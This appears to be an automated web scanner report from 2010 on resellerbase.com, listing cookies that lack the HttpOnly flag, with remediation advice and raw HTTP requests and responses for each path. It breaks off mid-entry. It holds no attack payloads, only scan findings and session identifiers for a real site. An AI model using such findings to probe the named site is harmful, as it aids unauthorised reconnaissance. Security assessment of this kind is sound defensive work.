If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.resellerbase.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.bing.com/search?q=resellerbase.com&src=IE-SearchBox&Form=IE8SRC
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:54:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8fd7ea683f7a8d29035c1d87ef6494ca; path=/
Vary: User-Agent
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 47555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>TOP 100 Reseller pro
...[SNIP]...

4.2. http://www.resellerbase.com/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/a
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Thu, 18 Nov 2010 00:11:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /a
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.3. http://www.resellerbase.com/adult/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:28:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.4. http://www.resellerbase.com/adult/media-chat/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/media-chat/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:29:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/media-chat/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.5. http://www.resellerbase.com/adult/media-chat/more2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/more2.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/media-chat/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/more2.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:30:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/media-chat/more2.html
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.6. http://www.resellerbase.com/adult/media-chat/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/media-chat/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:31:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/media-chat/search.php?cat=17&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.7. http://www.resellerbase.com/adult/more2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/more2.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/more2.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:33:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/more2.html
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.8. http://www.resellerbase.com/adult/personals-dating/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/personals-dating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:31:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/personals-dating/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.9. http://www.resellerbase.com/adult/personals-dating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:32:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/personals-dating/search.php?cat=13&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.10. http://www.resellerbase.com/adult/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.11. http://www.resellerbase.com/browsepr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /browsepr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /browsepr.php?pr=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=5
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:25:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /browsepr.php?pr=5
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.12. http://www.resellerbase.com/communication/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:34:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.13. http://www.resellerbase.com/communication/broadband/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/broadband/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:34:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/broadband/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.14. http://www.resellerbase.com/communication/broadband/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:35:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.15. http://www.resellerbase.com/communication/mobile-content/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/mobile-content/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:36:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/mobile-content/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.16. http://www.resellerbase.com/communication/mobile-content/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/mobile-content/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:37:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/mobile-content/search.php?cat=16&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.17. http://www.resellerbase.com/communication/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.18. http://www.resellerbase.com/detail/10/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/10/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=10&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:02:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:02:35 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:02:35 GMT; path=/
Location: /detail/10/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.19. http://www.resellerbase.com/detail/11/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/11/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=11&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:14:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:14:52 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:14:52 GMT; path=/
Location: /detail/11/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.20. http://www.resellerbase.com/detail/12/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/12/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=12&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:17:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:17:00 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:17:00 GMT; path=/
Location: /detail/12/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.21. http://www.resellerbase.com/detail/13/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/13/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=13&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:23:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:23:04 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:23:04 GMT; path=/
Location: /detail/13/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.22. http://www.resellerbase.com/detail/14/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/14/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=14&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:06:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:06:22 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:06:22 GMT; path=/
Location: /detail/14/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.23. http://www.resellerbase.com/detail/15/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/15/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/15/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=15&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:19:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:19:58 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:19:58 GMT; path=/
Location: /detail/15/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.24. http://www.resellerbase.com/detail/16/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: COOKIE_SORT_BY and COOKIE_SORT_ORDER (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/16/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
